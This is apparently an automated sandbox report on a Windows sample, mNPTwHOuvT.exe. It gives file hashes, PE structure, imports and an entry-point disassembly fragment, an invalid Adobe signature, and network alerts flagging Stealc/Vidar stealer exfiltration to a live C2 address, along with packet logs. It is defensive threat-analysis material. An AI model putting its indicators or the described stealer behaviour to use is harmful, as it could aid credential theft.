                                                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):133209
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.436083073282464
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:f8k2hK+G05hzyxT+BVAkYocA5rfuZUY2i6e:f2hZJy1JkYocA5rf6UY8e
                                                                                                                                                                                                                                                                                                                          MD5:CDA6F2942945952D985067C7CBC140F3
                                                                                                                                                                                                                                                                                                                          SHA1:7DC4F8BCCCA64351F6934DA7F59E3A08C8CAE192
                                                                                                                                                                                                                                                                                                                          SHA-256:56C2F0A4E032C7120F78EA9DF680E1D2517716DD697D64C98D2AC4E890999CF4
                                                                                                                                                                                                                                                                                                                          SHA-512:84BAB6A07B31CED75F7577DF3A884C97782707B27F30F0E729974EE3A52C642A5488642E2CA06896E8EA0A16412FFB04AD07DF80BCBBCFF9813B60AD172794A8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):117446
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                                                                                          MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                                                                                          SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                                                                                          SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                                                                                          SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):5162
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.CEsjJf2wziM.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTvDtorsWuiBHYzP5-lS7pwgoAa95g"
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.982307107102074
                                                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                          File name:mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File size:1'352'826 bytes
                                                                                                                                                                                                                                                                                                                          MD5:2db319e8bfd0b40bb3ac999cf4e6670c
                                                                                                                                                                                                                                                                                                                          SHA1:c339ddf42d76c1a5ee35c3e6f14c6f818cc934f6
                                                                                                                                                                                                                                                                                                                          SHA256:15a69592874503ccd6542cd58a70e20fac83e7e795505c11b9a379bb005090da
                                                                                                                                                                                                                                                                                                                          SHA512:1d43b392be6e91a697220af5c8518c6d22652286e16cde833f7f4bd9bde034497a7a63f81f748f1c5ca23d8c87f982e8d85284219d1c2c7018c5685b58ab3a1c
                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:fm56VOOHViKhAKokILPMKtItZFlSMFYdKibT92dyAiMVFWKxfHkyQK4GXG:66VOMUK6KokjKOXFlSMvibwyUWKxvQ5b
                                                                                                                                                                                                                                                                                                                          TLSH:1355239217E89436FBD31E7538B4DA22C6E475020D159E0F2798DDE63A16B608F413FB
                                                                                                                                                                                                                                                                                                                          Icon Hash:c4cc314c8581fc25
                                                                                                                                                                                                                                                                                                                          Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                          Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                          Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                                                                                                          • 03/11/2023 01:00:00 05/11/2025 00:59:59
                                                                                                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                                                                                                          • CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                                                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                                                                                                          Thumbprint MD5:464C015DAA50884AB4DD5502E6B164B0
                                                                                                                                                                                                                                                                                                                          Thumbprint SHA-1:96B7B1EF175BBA4BDE33A05402134289B28B5BCB
                                                                                                                                                                                                                                                                                                                          Thumbprint SHA-256:ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
                                                                                                                                                                                                                                                                                                                          Serial:0D1A340F78D7D000E089FDBAAD6522DF
                                                                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                                                                          sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                                          mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F0C60F280EBh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F0C60F27DCDh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F0C60F27DBBh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F0C60F256BAh
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F0C60F27A91h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F0C60F25743h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F0C60F256BAh
add esi, 02h
cmp word ptr [esi], bx

Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x64f22 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x147ae2 | 0x2998 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x64f22 | 0x65000 | ae257c11896a4b7dbfc2f7a0ede1d3e0 | False | 0.9954628519492574 | data | 7.973137113619916 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x165000 | 0xfd6 | 0x1000 | 097ff2412c52cd6cae1a0e1d5b3ca5e1 | False | 0.5986328125 | data | 5.582035525322347 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1001f0 | 0x616e5 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9985165770014308
RT_ICON | 0x1618d8 | 0x2c5d | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.000968565642335
RT_ICON | 0x164538 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8404255319148937
RT_DIALOG | 0x1649a0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x164aa0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x164bbc | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x164c1c | 0x30 | data | English | United States | 0.875
RT_MANIFEST | 0x164c4c | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193

DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-12T17:22:43.902166+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49851 | 195.201.141.106 | 443 | TCP
2025-01-12T17:22:45.079946+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49860 | 195.201.141.106 | 443 | TCP
2025-01-12T17:22:45.899918+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.5 | 49860 | 195.201.141.106 | 443 | TCP
2025-01-12T17:22:46.576648+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49869 | 195.201.141.106 | 443 | TCP
2025-01-12T17:22:47.906794+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49880 | 195.201.141.106 | 443 | TCP
2025-01-12T17:22:48.602342+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 195.201.141.106 | 443 | 192.168.2.5 | 49880 | TCP
2025-01-12T17:22:49.276293+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49890 | 195.201.141.106 | 443 | TCP
2025-01-12T17:22:49.941821+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.5 | 49890 | 195.201.141.106 | 443 | TCP
2025-01-12T17:22:49.942460+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 195.201.141.106 | 443 | 192.168.2.5 | 49890 | TCP
2025-01-12T17:22:51.730323+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49902 | 195.201.141.106 | 443 | TCP
2025-01-12T17:22:51.742293+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49901 | 195.201.141.106 | 443 | TCP
2025-01-12T17:22:59.824701+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49969 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:00.910589+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49978 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:01.952740+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49988 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:03.498656+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49995 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:04.313417+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50004 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:10.654868+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50043 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:11.873153+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50051 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:12.885715+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50063 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:13.937567+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50074 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:16.216233+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50105 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:17.295384+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50113 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:19.402979+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50115 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:20.736794+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50117 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:22.063974+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50120 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:23.438444+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50124 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:27.518206+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50134 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:29.315486+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50137 | 195.201.141.106 | 443 | TCP
2025-01-12T17:23:30.674100+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50142 | 195.201.141.106 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.576544046 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.576647997 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.577111006 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.577136993 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.578824043 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:46.578838110 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246037960 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246092081 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246223927 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246247053 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246350050 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246768951 CET49869443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.246802092 CET44349869195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248225927 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248264074 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248452902 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248817921 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.248832941 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.906697989 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.906794071 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.907213926 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.907222986 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.909181118 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:47.909188032 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602118015 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602149963 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602226973 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602233887 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602264881 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.602313042 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.606931925 CET49880443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.606949091 CET44349880195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608591080 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608638048 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608733892 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608916998 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:48.608930111 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.276230097 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.276293039 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.276851892 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.276859045 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.279675961 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.279684067 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.941886902 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.941992998 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.942019939 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.942080021 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.942106009 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.942151070 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.986936092 CET49890443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:49.986963987 CET44349890195.201.141.106192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:50.032265902 CET49901443192.168.2.5195.201.141.106
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:50.032304049 CET44349901195.201.141.106192.168.2.5
